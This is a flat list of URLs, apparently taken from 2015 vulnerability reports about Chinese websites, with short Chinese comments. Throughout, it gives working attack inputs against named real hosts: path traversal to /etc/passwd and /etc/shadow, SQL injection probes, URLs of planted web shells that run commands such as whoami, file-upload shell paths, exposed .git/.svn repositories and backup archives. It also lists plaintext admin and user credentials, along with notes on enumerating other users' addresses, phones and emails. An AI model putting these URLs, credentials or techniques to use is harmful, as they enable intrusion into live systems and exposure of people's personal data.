http://iccb.99wuxian.com/air/iphone/air/order/air-order!getOrderForPay.action?orderId=99 http://dds.dji.com http://api.dji.com http://222.223.36.23:8089/wscgs/gzAction_viewGzList.action?gz.type=1 http://220.178.98.86/hfgjj/jsp/web/public/search/getPw.jsp http://contract.9fbank.com:9086/micro_kh/borrowing/list/getPayPlan?applicationId=157143 http://i.49you.com/ 
http://wwan.49you.com/.svn/entries http://i.49you.com/news/item/catid/55/id/15'.html http://180.150.185.34/ http://cms.49you.com//cms.sql http://bbs.digione.cn:7080//uc_server/data/tmp/upload48671.jpg/.php http://202.100.226.171/Default.aspx http://202.100.226.171/AdminLogin.aspx http://wooyun.org/bugs/wooyun-2015-0122761 http://119.254.70.121/upload/video/file_0000000305.jsp http://oa.nesc.cn/login/login.jsp http://oa.nesc.cn/userLoginAction.do http://oa.nesc.cn/login/login.jsp http://59.151.39.93:8080/console http://59.151.39.93:8080/shell/shell.jsp?cmd=whoami http://1000eb.com/1dtrw http://subsite.nenu.edu.cn/qnn/questionnaire.php?cs=8295 http://www.hnipo.net:8089/hy/login.jsp,密码已经自动生成,只需输入用户名admin和验证码即可登录。或者输入admin1//123456也可登录。 http://www.hnipo.net:8089/hy/manager/ipr/regQt/load_announ.action存在命令执行漏洞 http://service.ehang.com index.php/order/editorder/id/168* http://www.gsszczx.com/www/PrintExplain.asp?ApplyId=124150 http://www.gsszczx.com/www/PrintExplain.asp?ApplyId=124152 http://www.gsszczx.com/www/PrintExplain.asp?ApplyId=124153 http://sh.yiguo.com/UC/UserVote.aspx?commodityid=51a6e283-2547-4ae6-b687-8322ca4324d6 http://www.xigou100.com/user/forget.html http://www.lotterygd.cn http://www3.lotterygd.cn http://www.bjqx.gov.cn/consult.php?a=list&cid=1 http://www.ysmmall.com/emall/member/center/edit_address_input.html?id=357658 http://211.138.195.11/custom/pages/login.jsp http://211.138.195.11/custom/pages/login.jsp http://www.ztemall.com/ http://www.ztemall.com/payxx.html?xsbh=XX20150626003,通过遍历订单号,可以看到收货地址,电话等基本信息,但是无法查看订单详情: http://www.wanbu.com.cn/1.php http://www.wanbu.com.cn/server-status http://www.guocool.com http://**.**.**.**/SHowFiles/EquBookList.aspx http://**.**.**.**/syjx/share/SHowFiles/EquBookList.aspx http://**.**.**.**/SHowFiles/EquBookList.aspx http://**.**.**.**/nxdyq/SHowFiles/EquBookList.aspx http://zjy.gdcost.com/print/apply_jxjy.aspx?jxjyid=71140 http://zjy.gdcost.com/print/apply_jxjy.aspx?jxjyid=71142 
http://zjy.gdcost.com/print/apply_jxjy.aspx?jxjyid=71143 http://event.gigabyte.cn/4years/ajax/new_checkzhuban.ashx?rcode= http://event.gigabyte.cn/4years/ajax/isbinglian.ashx?openid= http://fund.moe.edu.cn:80/sendEmail.action;教育部经费管理系统下存在远程命令执行漏洞,可执行命令获取服务器控制权限,对整个系统安全性构成严重威胁。 http://javatest.west263.com/userlist.jsp?sortfield=userid http://i.49you.com/game/item/catid/46/id/7.html http://www.leyou.com.cn/user/leyou/ManageInfo.php http://60.247.54.38:8089/SATTRAK/admin.jsp http://cm.zhangyue.com:80/a.tar.gz http://www.gxpiao.com/ http://www.gxpiao.com/YCDD150423-0114.html http://bbs.hikemobile.com/ http://www.hikemobile.com/hikeuc/data/tmp/upload31430.jpg/.php http://**.**.**.**:8080/workfield_tz/before/xyxxgx_cydwViewAll.do?yyzzzch=事证-D123456 http://**.**.**.**:8080/workfield_rg/before/xyxxgx_cydwViewAll.do?yyzzzch=320682000066280 http://**.**.**.**:8080/workfield_rg/before/xyxxgx_cydwViewAll.do?yyzzzch=320682000172132 http://**.**.**.**:8080/workfield_hm/before/xyxxgx_cydwViewAll.do?yyzzzch=320623000109815 http://**.**.**.**:8080/workfield_qd/before/xyxxgx_cydwView.do?yyzzzch=21084000031445&typesInShow=qyjbxx&depId=_ http://**.**.**.**:8080/workfield_hm/before/xyxxgx_cydwView.do?yyzzzch=3206842100865&typesInShow=cydwwfxx_cydwxzcfxx_cydwxzqzxx_cydwxzcjxx_qxjqjsbjxx_zlaqxx http://old.szytou.com/images/upload/data_file/847/20156261542367577.jpg/.php http://**.**.**.**/S/Default.aspx?theme=%E8%AF%BE%E4%BB%B6%27&Subject=%E6%94%BF%E6%B2%BB http://**.**.**.**/S/Default.aspx?theme=%E8%AF%BE%E4%BB%B6%27&Subject=%E6%94%BF%E6%B2%BB http://www.pailifood.com http://www.lshtyy.com http://www.guoniangfood.com http://www.cdgute.com http://www.heleegroup.com http://www.mxdl.com.cn http://www.ztsd.cn/ http://www.oldmansion.cn/ http://www.reachgroup.cn/ http://www.gigi.com.cn/ http://www.schlls.com/ http://www.lyhnhotel.com/ http://www.cd-sr.com http://www.reachgroup.cn http://www.cnbestluck.com http://henwei.wm10.mingtengnet.com/ http://www.hscatv.com http://cwrh.scu.edu.cn 
http://www.scwlrd.com http://www.zitonggong.com http://www.scbaijia.com http://www.gigi.com.cn http://www.wyjt.cn http://www.xinmingsl.com http://www.sferp.com http://www.beifei.cn http://www.scasdq.com http://sctlkj.com http://www.minsen.com http://www.birdhouse.org.cn http://henwei.wm10.mingtengnet.com http://sc-yunheng.com http://www.cdgute.com http://www.cdhot.cc http://www.jolen.com.cn http://hatyf.com http://qsjds.com/ http://qsjds.com http://quanfengjiuye.com http://m.darryring.com/AddAddress.aspx?id=56716,直接修改id就可以查看到其它用户的收获地址 http://www.test.sfn.com.cn/index.php/admin/login https://meican.com/account/forgotpassword https://meican.com/account/mobilelogin?mobileNumber= http://gad.qq.com/config/GetConfigList https://ticket.licaifan.com/login http://www.ruiqi.cd/理财端是 www.okdai.com http://minghang.im/ http://mail.okdai.com:999/Account/ http://115.29.188.181:999/Content/UploadFiles/201506261446116205bh.aspx http://www.ruiqi.cd/wooyun.txt http://ahnsfw.aisino.com/ahwsbsdt/login.jsp http://ahnsfw.aisino.com/ahwsbsdt/WEB-INF/struts-config.xml http://ahnsfw.aisino.com/ahwsbsdt/adminpostlist.jsp http://ahnsfw.aisino.com/ahwsbsdt//WEB-INF/applicationContext.xml jdbc:oracle:thin:@172.16.1.196:1521:nsfwdb http://61.190.68.67/nssbweb_ais/RpcServlet"/ http://192.168.2.13:8011/ahwsbsdt/servlet/RpcServlet"/ http://yunying.49you.com/index.php?g=Admin&m=Login https://8.gd10010.cn https://8.gd10010.cn/p/resetLoginPass?MBL_NO=13184390435 https://8.gd10010.cn https://8.gd10010.cn/p/resetLoginPass https://8.gd10010.cn/wc/resetLoginPass https://8.gd10010.cn/wc/resetLoginPass?MBL_NO=13184394739 URL:http://xinpan.zzhz.zjol.com.cn/zjol/newhouse/admin/Admin_login.html http://sales.happyinsurance.com.cn:7001/HL-Update/updateManage.jsp http://sales.happyinsurance.com.cn:7001/HL-Update/updateFiles/5.01.sug http://sales.happyinsurance.com.cn:7001/HL-Update/updateFiles/xxx.jsp http://my.fang.com/Account/ModifyUserInfo.do?v=0.627420610694839 http://www.smgjj.com/UploadFile/Import/DataTemp/ 
http://www.smgjj.com//newsbolcksecondlist.aspx?class=91be1fbd-5560-4fd0-91b6-2d0f5ae2f5b0&parentclass= www.smgjj.com/database/DataInput.aspx http://www.ehang.com:80/ www.ehang.com http://220.181.150.107/web.tgz URL:http://www.wepiao.com/?m=web&c=cinema&a=cinemadetailshow&cinemaid=1003290 https://code.jquery.com/jquery-1.9.1.min.js http://124.117.241.186:8787/SafeManagerWeb/loginAction!caLogin.action存在命令执行漏洞 http://blog.knownsec.com/2015/03/jsonp_security_technic/ http://drops.wooyun.org/papers/6630 https://code.jquery.com/jquery-1.9.1.min.js http://www.cashboxparty.com/star/star_basicdata.asp?sid=22 http://www.cashboxparty.com/star/star_excl.asp?sid=22 http://www.cashboxparty.com/star/star_newdisk.asp?sid=22 http://user.app.xywy.com/user.php?act=useredit http://bbs.ejiayu.com:5050/login.action http://bbs.ejiayu.com:5050/3.jsp?pwd=023&i=ls http://my.fang.com/MessageDefault/SendMessage.do http://oa.ctctc.cn:81/bpm/sso.nsf/login?openagent http://gad.qq.com/tool/getNewToolList?getCount=0&page=0&pageSize=5 http://www.caizhimofang.com/www.caizhimofang.com.rar http://git.weimai.com http://git.weimai.com/weimai/shangbao1/blob/master/Conf/config.php http://gonggao.org.cn/Jsp/cpmanage/feedback/sh_gzshow.jsp?cp_id=86743 http://202.109.255.72:9000 http://www.chtourong.com/member/common/login/ http://www.zydaibao.com/Account/FindPassword filetype:txt https://code.google.com/p/studentofficedocs/source/browse/trunk/%E5%AD%A6%E9%99%A2%E7%BE%A4%E5%8F%91%E7%9F%AD%E4%BF%A1%E7%94%A8%E6%88%B7%E5%90%8D%E5%AF%86%E7%A0%81.txt?r=9 m.feihe.com/qidai_content.aspx?id=113 http://baikan.zongheng.com/wap/search?pos=2&mo=&cm=M3140060&site=0&k=1 http://baikan.zongheng.com/wap/search?pos=2&mo=&cm=M3140060&site=0&k=1 http://www.youkia.com/index.php/news/getcommentlist http://pg.hiall.com.cn/config/config_global.bak http://jxjc.xjtu.edu.cn/website/news.php?id=100327 http://zc.suning.com/project/add.htm 
http://storeadmin.cnsuning.com/store-admin-web/admin/storeManage/storeInfo/sysManagerUserInfo/2015%252D06%252D01-2015%252D06%252D30---.htm http://www.iliangcang.com/i/shoppingcar/?act=delOne&cart_id=113512,看到这应该猜到估计可以删除其它cart_id的商品了 https://www.dianjr.com/user/forgetpwd http://www.iliangcang.com/i/goods/?act=deleteComm&id=4710 http://**.**.**.**/syjx/share/SHowFiles/MoreEqu.aspx http://**.**.**.**/SHowFiles/MoreEqu.aspx http://**.**.**.**/SHowFiles/MoreEqu.aspx http://**.**.**.**/nxdyq/SHowFiles/MoreEqu.aspx http://www.mangocity.com/index.php/freeline/productinfo_controller/journey_print?thirdpartid=215330p1 http://**.**.**.**/tzptweb/PeopleFreePress/accuse_list_page.aspx http://**.**.**.**/PeopleFreePress/accuse_list_page.aspx http://183.61.118.75 http://183.61.118.75/manager/html/ http://psychling.psych.ac.cn/members/everyone.php?filename=yangyf.php http://psychling.psych.ac.cn/members/everyone.php?filename=http://www.baidu.com http://m.mfa.go.th http://m.mfa.go.th/mofa/ http://www.xmtcs.fjxm110.gov.cn/xmga/web/listWeiXinsExt3 http://iwan.baidu.com/MobilegameAjax/isUserHasSubGift?gameid=589&gamename=我是注入点&gametype=shouyou http://mail.dianrong.com/ http://tongji.baidu.com/web/welcome/login http://zixun.dianrong.com/wp-admin http://jira.dianrong.com/ http://vote.10jqka.com.cn/webvote/index.php?vid=1f66d55819ac09bba97993dd89d61bf3 http://220.181.130.213:80/comment/wypl.jsp?title=Y_Vickers http://log.im.wo.cn/webportal/resources/validateCode http://xyk.nwu.edu.cn/homeLogin.action http://gm.49you.com/spirit/send2.html www.ehang.com/index.php?a=index&c=Index&g=Addon&m=Search&mid=3&time=day&wd=1 www.ctmedia.net http://user.adesk.com http://nagios.adesk.com http://user.adesk.com http://www.4008118228.cn/ http://www.4008118228.cn/jsp/yingxb/herodetail.jsp?Prop1=19303&InnerCode1=0062000800050001 http://www.4008118228.cn/jsp/yingxb/herodetail.jsp?Prop1=19303&InnerCode1=0062000800050001 http://www.hicn.com.cn/Home/Index 
http://www.hicn.com.cn/member/DomainManage/OrderInfo?id=164265 http://www.hicn.com.cn/member/DomainManage/OrderInfo?id=164266 http://wssp.hainan.gov.cn/wssp/hn/module/wssp/regist/sendMsgCode.jsp?mobile=18288888888 http://www.kancloud.cn/.git/config inurl:login http://61.155.209.38/DSM/login.aspx http://nmap.org/nsedoc/scripts/http-methods.html http://221.6.112.10:9999/safe/login.jsp http://221.6.112.10:9999/safe/enterprise/enterpriseAction!isCorpExist.action存在命令执行漏洞 http://202.203.158.123/Admin/ http://202.203.158.117/Index/login http://sddx.com.cn/news.asp?id=190注入点 http://**.**.**.**:8080/workfield_hm/before/xmxxgk_viewXmxx.do http://**.**.**.**:8080/workfield_qd/before/xmxxgk_viewXmxx.do http://**.**.**.**:8080/workfield_rg/before/xmxxgk_viewXmxx.do http://**.**.**.**:8080/workfield_rg/before/xmxxgk_getXmxxgkView.do?column=xmbm&value=2015320682FG0007&viewName=before_xmspgkxx&type=1&typesInShow=xmjyspfjgxx_kxxyjbgpfjgxx_cbsjfapfjgxx_jnpgscpfjgxx_ghxzyjpfjgxx_ydpfwjjgxx_hjyxpjspdjgxx_sgxkspxx_xmbaxx&depId http://**.**.**.**:8080/workfield_hm/before/xmxxgk_getXmxxgkView.do?column=xmbm&value=2015320684FG0016&viewName=before_xmjsglxx&type=2&typesInShow=zlaqjcxx http://**.**.**.**:8080/workfield_qd/before/xmxxgk_getXmxxgkView.do?column=xmbm&value=2014320681FG0012&viewName=before_xmspgkxx&type=1&typesInShow=xmjyspfjgxx_kxxyjbgpfjgxx_cbsjfapfjgxx_jnpgscpfjgxx_ghxzyjpfjgxx_ydpfwjjgxx_hjyxpjspdjgxx_sgxkspxx_xmbaxx&depId=_ http://www.sxsfgl.gov.cn/2015sxsfgl/gzfw_lkshow.php?id=13 https://github.com/callmeharry/pelican/blob/9135d9fe6e8b065e5fdec248fb6d795f0b3b9386/pelican/lib/mail/test/test.js http://www.vcyber.com:80/ www.vcyber.com http://www.veaka.com/veaka.zip http://jf.minxindai.com/ http://jf.minxindai.com/jfAddress/findJfAddressList.mxd http://jf.minxindai.com/jfAddress/toEditJfAddress.mxd?addressId=1644 http://120.132.154.11:8080/web/rdlogin.jsp http://120.132.154.11:8080 http://www.haohaizi.com/ http://**.**.**.**:8088/Message/mView.aspx?mId=4&type=2 
http://**.**.**.**/Message/mView.aspx?mId=4&type=2 http://**.**.**.**/Message/mView.aspx?mId=4&type=2 http://wo.cn http://passport.wo.cn:30000/favorite-hot-videos/myfavorite.do http://www.fjbs.gov.cn http://www.fjbs.gov.cn/eWebEditor/admin/login.jsp http://www.fjbs.gov.cn/eWebEditor/admin/upload.jsp?id=0&dir=../../ http://www.gz96833.com/comqnaList.action?dictid=1&flag=1 http://www.gz96833.com/useGasTypeList.action?dictid=1&flag=1 http://www.gz96833.com/useGasTypeListView.action?fid=326&typeid=2&detailid= http://www.nx.gov.cn/member/memberSysm.htm URL:http://campus.globalmarket.com/phpmyadmin/ root:globalmarket http://**.**.**.**/t_lyxxb_Action.do?TASK=select_self http://**.**.**.**//t_lyxxb_Action.do?TASK=select_self http://**.**.**.**:8080//t_lyxxb_Action.do?TASK=select_self index.php/Home/Facebooklike/join http://zxx.eyougame.com/ http://121.15.254.21/login.shtml存在注入漏洞,参数uid inurl:gov.cn/news_info.asp?id= http://www.dyhlw.gov.cn/News_info.asp?ID=5401 http://www.lzsmzj.gov.cn/news-info.asp?id=398'&cataid=1 http://www.yjjs.gov.cn/news_Info.asp?rs_id=7455 http://fhoaf.gov.cn/news_info.asp?id=2960 http://www.fhagri.gov.cn/xmsb/news_info.asp?id=2693 http://www.tnwsj.gov.cn/ShowNewsInfo.asp?news_id=638'&type_parid=,459 http://tjdata.haimen.gov.cn/chart_singleDataList.do?type=index http://tjdata.haimen.gov.cn/chart_economicDataList.do?type=index http://help.51web.com/download页面 http://help.51.com/download/../../../etc/passwd http://help.51web.com/download/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd http://222.168.22.56:443/Conf/jsp/main/mainAction.do http://222.168.22.58:443/Conf/jsp/main/mainAction.do https://github.com/zh69183787/dp-shopdiy/blob/7bef004037b7bfa96d91b578d2fe7e894c9a007b/shopdiy-biz/src/main/java/com/dianping/midas/shopdiy/biz/util/Mails.java http://xy.jaswzzb.com/bmadmin/index.asp http://1.184.208.123/index.php http://1.184.208.123/wooyun.php http://119.254.70.121/bull/toBullAuthentication.html http://119.254.70.121 
http://bh.szdiyibo.com/index.php?a=newlist&term=3 inurl:FlightOrderDetail.asp http://www.glgoo.com/search?q=inurl%3AFlightOrderDetail.asp http://ucenter.egou.com/data/config.inc.php http://www.xlfy.org/iweb/show.action http://61.158.214.4/epg/template/template705/pv.php?movieid=4618257&sid=0.5 http://61.158.218.17/epg/template/template705/pv.php?movieid=4618257&sid=0.5 http://61.158.215.201/epg/template/template705/pv.php?movieid=4618257&sid=0.5 http://61.158.215.145/epg/template/template705/pv.php?movieid=4618257&sid=0.5 http://61.158.214.35/epg/template/template705/pv.php?movieid=4618257&sid=0.5 www.jxlife.com.cn/online/shs/csinquiry/DocumentQuery/search/download.jsp?fileName=968_1388365801357.pdf&filePath=L2FwcC9XZWJTcGhlcmUvc2hhcmUvbWlzL3VwbG9hZA== www.jxlife.com.cn/online/shs/csinquiry/DocumentQuery/search/download.jsp?filePath=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n http://bhmc.szdiyibo.com/index.php?g=admin&m=public&a=login http://activecard.zsins.com:7011/iss_dbwebins/ec/alltrustcard/cardRegister.jsp http://activecard.zsins.com:7011/iss_dbwebins/bs/login.jsp https://github.com/rh20083907/maven-demo/blob/2b6bacd71601403381886b0c5ab562f7098dc29f/maven-core/src/main/java/com/jeary/maven/core/mail/SendMail.java inurl:http://map.baidu.com/detail?qt=movie&act=detailpc http://duoyunlai.baoogu.com/supplier/searchDeliveryById.htm?id=4263 http://www.zgsms.net/ https://github.com/unicomdog/baolizhibiao/blob/e5ed6113e9d1d9b1736ebf26e69b866e23f8a77b/BB_Maker.py http://shop.povos.com.cn/eshop/povosdg/order_info.jsp?order_no=SO2015062700005 http://scm.365pp.com/Login/Index username:admin password:123qwe!@# http://ekp.joyu.com/ Url:http://www.test.sfn.com.cn/index.php/admin/ http://www.hk.chinaunicom.com/.svn/entries http://www.whfao.gov.cn/gonggaonew.jsp http://www.whfao.gov.cn/news.jsp http://www.whfao.gov.cn/newshow.jsp http://www.whfao.gov.cn/newshow.jsp http://a.g.gomesell.com/login/login.action https://m.zrcaifu.com/login 
http://rddp.midea.com.cn:9083/rtssh/LoginAction.action http://58.252.101.42:9083/rtssh/LoginAction.action http://**.**.**.**/tzptweb/powercode/power_importdocuments_list_page.aspx http://**.**.**.**/powercode/power_importdocuments_list_page.aspx http://lz.eroadsoft.com/Default.aspx http://192.168.168.1/login/x www.ikuai8.com http://365.wo.cn/ http://www.feijipiao.cn http://www.feijipiao.cn/Account/Login http://m.lashou.com/retrievePwd.php http://price.xcar.com.cn/serise1089/city1038-1-1.htm?is_cms=15&pop=open&mid=10853 http://passport.cnmo.com/register/email/11109050 http://club.hhedai.com/uc_server/admin.php http://leleshan.leyou.com.cn/user/findpwstep1 http://kf.backend.playcrab.com/assign/index http://kf.backend.playcrab.com/assign/index http://kf.backend.playcrab.com/assign/index http://i.49you.com/news/item/catid/55/id/15* http://gm.49you.com/order/line/rid/15158.html http://svn.49you.com/.bash_history com:7002 com:7002/ePay/order_toOrderHis http://**.**.**.**/bugs/wooyun-2015-0109795前人洞而发 http://**.**.**.**/sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**/sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**/sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**/sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**//sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**/sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**/sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**/sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**/sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**/sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**/sysTemplateWeb/hits.aspx?CatalogId=1101 http://**.**.**.**/sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 http://**.**.**.**/sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 http://**.**.**.**/sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 
http://**.**.**.**/sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 http://**.**.**.**//sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 http://**.**.**.**/sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 http://**.**.**.**/sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 http://**.**.**.**/sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 http://**.**.**.**/sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 http://**.**.**.**/sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 http://**.**.**.**/sysTemplateWeb/NewmessageShow.aspx?XXDM=440307000003&ArticleID=483 http://**.**.**.**/sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 http://**.**.**.**/sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 http://**.**.**.**/sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 http://**.**.**.**/sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 http://**.**.**.**//sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 http://**.**.**.**/sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 http://**.**.**.**/sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 http://**.**.**.**/sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 http://**.**.**.**/sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 http://**.**.**.**/sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 http://**.**.**.**/sysTemplateWeb/Contents.aspx?XXDM=440307000003&CatalogId=11010102&PageSize=29&IsParentCatalog=0 
http://**.**.**.**/systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**/systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**/systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**/systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**//systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**/systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**/systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**/systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**/systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**/systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**/systemplateweb/multiweb.aspx?XXDM=440304123456&webno=1533 http://**.**.**.**/sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://**.**.**.**/sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://**.**.**.**/sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://**.**.**.**/sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://**.**.**.**//sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://**.**.**.**/sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://**.**.**.**/sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://**.**.**.**/sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://**.**.**.**/sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://**.**.**.**/sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://**.**.**.**/sysTemplateWeb/ShowPhotoIndex.aspx?XXDM=440307000009&CatalogId=11 http://211.138.195.223:9090/webapi/plugin?cls=/../../../../../../../../../../../../etc/passwd%00.html http://211.138.195.223:9090/webapi/plugin?cls=/../../../../../../../../../../../../etc/shadow%00.html 
http://leleshan.leyou.com.cn/user/login http://**.**.**.**/bugs/wooyun-2015-0117270之后另一处: http://**.**.**.**/web/index.aspx http://**.**.**.**/web/index.aspx http://**.**.**.**/web/index.aspx http://**.**.**.**/web/index.aspx http://**.**.**.**/web/index.aspx http://**.**.**.**/web/index.aspx http://**.**.**.**/web/activiList.aspx?ActiviId=13%20and%201%3E@@version-- city.chinago.cn/do/activity/activity.php?op=1 www.sipf.com.cn) http://www.sipf.com.cn/bin/Order?m=nwod&filePath=/upload/APPSERVERMNG001/publicatoin/eJournal//1221108775468786.pdf&fileName=%D6%D0%B9%FA%D6%A4%C8%AF%CD%B6%D7%CA%D5%DF%B1%A3%BB%A4%BB%F9%BD%F0%D4%CB%D7%F7%C4%A3%CA%BD%D1%D0%BE%BF http://www.sipf.com.cn/bin/Order?m=nwod&filePath=/upload/APPSERVERMNG001/publicatoin/eJournal//../../../../../../../etc/passwd&fileName=passwd http://ady.oa5.meetok.com/Account/AddressMng.aspx http://e.zol.com.cn/ http://e.zol.com.cn/Default/Check/ http://113.240.245.42:8081/A430121chss/chss.html# http://tvp.multimedia.tcl.com/sysadmin/login.aspx http://tvp.multimedia.tcl.com/UploadFiles/Images/2015/6/20150628152911.aspx http://i.49you.com/company/index/catid/43*.html http://i.49you.com/company/index/catid/43%20and%201=1.html http://i.49you.com/company/index/catid/43%20and%201=2.html http://www.lemonsay.com/ShopList.aspx?dl2=%E5%A4%A7%E4%B8%9C%E6%B5%B7 www.epicc.com.cn http://122.224.110.186:8888/MediinfoOA/login.aspx http://www.jx.10086.cn/xxt/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector http://www.jx.10086.cn/xxt/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=http://www.jx.10086.cn/xxt/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector http://www.cooli.cn/HelpCenter/Help_index.aspx?help=0101 www.49you.com http://i.49you.com/news/item/catid/55*/id*/15*.html http://i.49you.com/news/item/catid/55*/id*/15*.html http://sqlmap.org http://www.class.cn/reset_passwd/reset_show?key=bqdv9A3ktekWdqkEB8np&email=48930141@qq.com 
http://www.class.cn/reset_passwd/reset_show?key=tXljtZaJt3kUa679CB4p&email=602779689@qq.com http://www.china-tax.org/about_study.asp?classid=68 http://125.39.194.15/user/login.action http://125.39.216.165/user/login.action brief_www-----http://www.ikanshu.cn/ brief_admin---http://admin.ikanshu.cn/ www.lntzb.gov.cn IP:218.60.144.211 http://www.lntzb.gov.cn/web/FCKeditor/editor/filemanager/connectors/uploadtest.html http://www.ttrc.gov.cn/jeecms/tag/person/Com_personInfo.do?infoID=4000 http://www.ttrc.gov.cn/jeecms/tag/person/Com_personInfo.do?infoID=18100 http://www.qimingzhongheng.com/hprp/usr/login.action site:51job.com inurl:loginname= http://www.51job.com/shenzhen?passport_loginname=15575376425&passport_password=zhuben456123&submit=%B5%C7%C2%BC http://admin.chinac.com/phpmyadmin/ http://online.suning.com/console/ http://m.dajie.com/resume/edit/practice?id=7426410&redir=/resume/index http://m.dajie.com/corp/1037249/discuss/101501?fromType=index http://order.yao.app.xywy.com/UserOrderManage/contactManage http://order.yao.app.xywy.com/ContactAddress/ajaxAddAddress http://116.213.178.99/.git/config http://116.213.178.99/.git/ url:http://bbs.xiaolajiao.com/space-uid-227015.html http://www.doc88.com/.svn/entries http://xuanwu.changba.com/ http://www.gdhydro.com/MaritimeManage/portal/n http://ac.cnas.org.cn/cnas/jsp/mr2certinfo/personinfo.jsp?orgId=1000000066&orgName=&year=2009&month=02 http://gs.cqupt.edu.cn/adminv612/ http://gs.cqupt.edu.cn/ajax/content.aspx?cType=soft&id=22&oper=ajaxDownCount&debugkey=5E7D-8A8B-F75C-BFF爆出物理路径如图 http://gs.cqupt.edu.cn/file.axd?file=D:\Web_Smylv\_data\config\conn.config即可下载数据库配置文件 http://oa.leyou.com.cn/app/cooperation/reply/replycoworklist.jsp?requestid=f3368c6e4700f2c5014715c047d20063 http://online.suning.com/console/ http://www.easybonuscard.com/.svn/entries http://www.in89.com.tw/news.php?nid=73 http://www.in89.com.tw/ticket.php?pid_for_show=4670 http://www.in89.com.tw/website_module.php?website_module_classify_sn=34 
http://www.in89.com.tw/news.php?nid=73 http://**.**.**.**/bugs/wooyun-2015-0108515而发 http://**.**.**.**:81/issue/news_more.jsp?Urltype=4 http://**.**.**.**/issue/news_more.jsp?pagestr=2&key=&Urltype=11 http://**.**.**.**/issue/news_more.jsp?Urltype=6 http://**.**.**.**/issue/news_more.jsp?Urltype=4 http://**.**.**.**/issue/news_more.jsp?Urltype=4 http://**.**.**.**/issue/news_more.jsp?pagestr=2&key=&Urltype=4 http://task.weimob.com/secure/BrowseProjects.jspa http://bable.weimob.com/dashboard.action http://qa.weimob.com/.svn/entries http://112.124.57.112:9999/.svn/entries http://112.124.28.82:9999";//邮件内容 http://112.124.57.112:88/install/index.php http://www.qhhrm.cn/zscx.asp http://www.qhhrm.cn/zscx/S-2.asp www.qhhrm.cn http://openbox.mobilem.360.cn/daren/detail?id=28623 http://user.weifengke.com/uact/seekPwd http://user.weifengke.com/uact/resetpwd?uid=19640529&sole_code=t5rwNE http://www.mangocity.com/index.php?d=search&c=search_controller&m=index&keyword= http://bbs.leyou.com.cn/bbs_space.tar.gz http://bbs.leyou.com.cn/bbs_uc.tar.gz 